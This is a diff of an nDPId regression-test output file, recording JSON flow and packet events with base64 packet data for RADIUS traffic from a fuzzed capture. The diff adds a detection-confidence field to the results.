-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998557233,"flow_last_seen":1528998557233,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1528998557233,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998557233,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPVAAP8RAAAKDEAexuIZPnIQBxQCxwAAAbQCv1ieXriqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998557233,"flow_last_seen":1528998557233,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998557233,"flow_last_seen":1528998557233,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998557233,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00533{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"ts_msec":1528998557316,"pkt":"ABRP+4rqcNuYVcUnCAAlAAClD1JAAPwRRKvG4hk+CgxAHgcUchAAkYCWC7QAiR2+QwBH7d0zmbIWMmGskGYBNTAzMTE0ODAwNzEzqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
 01320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1528998557443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528998557443,"pkt":"AAAMB6xAABRf+4rqCABFAAKrtPZAAP8RAAAKDEAexuIZPnIQBxQClwAAAbUCjwtpfsqTzU1AFz6VUQcilJsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQmKSVNQUjEwGgkAADghDQM1NwZbIqqdATUwMzExNDgwMDcxTzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1528998576080,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998576080,"pkt":"AAAMB6xuABRP+4rqCABFAALbIWRAAP8RAAAKDEAexuIZNXIQBxQCxwAAAbYCvyTqgpE\/GmAmnD4e+SZKCGIaCgAAV8gOBFVTaAwAAFfIDQZ3aWZpOg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqqwATUwMzExNDgwMDcxJQA0MzA0QHdsYW4ubW5jNDgwLm2tYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtNz4eJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b1JXaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDQ5MGFhMjI1YiwgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzBAasFAEQIA5WWldDMlRlc3TpYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABYslAAAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpX1jJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLJQBlc3QgTGFiGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998576181,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1528998576181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998576181,"pkt":"ABRP+4rqcNuYVcUnCABFAAClD7RAAPsRRVLG4hk1CgxAHgcWchAAkUUeC7YAjbHF+KxzM1jmiRGRdJnwnSQBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzTw4BAAAMFwwAAAwBf\/xQEmpMlHIe9v0pkoCIcMRZLH4="}
 01321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1528998576307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528998576307,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIWVAAP8RAAAKDEAexuIZNXIQBxQClwAAAbcCj0ICRJPAa6Qqmxpo\/C0gFa8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqqwAWEwMzExNDgwMDdhMzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDQ5MGFhMjI1YiwgNWIyMmFhOTAvYjA6OWQ6YmE6NGE6MGU6N2Uvqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
@@ -538,31 +538,31 @@
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1528998584808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998584808,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWZAAP8RAO05DEAexuIZNXIQcRQCxwAAAbgCv9zxrJZG2dsJ+s9nZZp6aFsaCgAAV8gOBFVTGgwAAFfIDQYlAGZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq4ATUwMzExNDgwMjUwODY0NjI4AXdsYW4ubW5jNDgwDm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNTkeJTZjLWIyLWFlLThlLTMxLTgwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPbEwZmYxMGFjMDAwMDAwY2M3OGE4MjI1YiwgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1BAasFAEQIKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
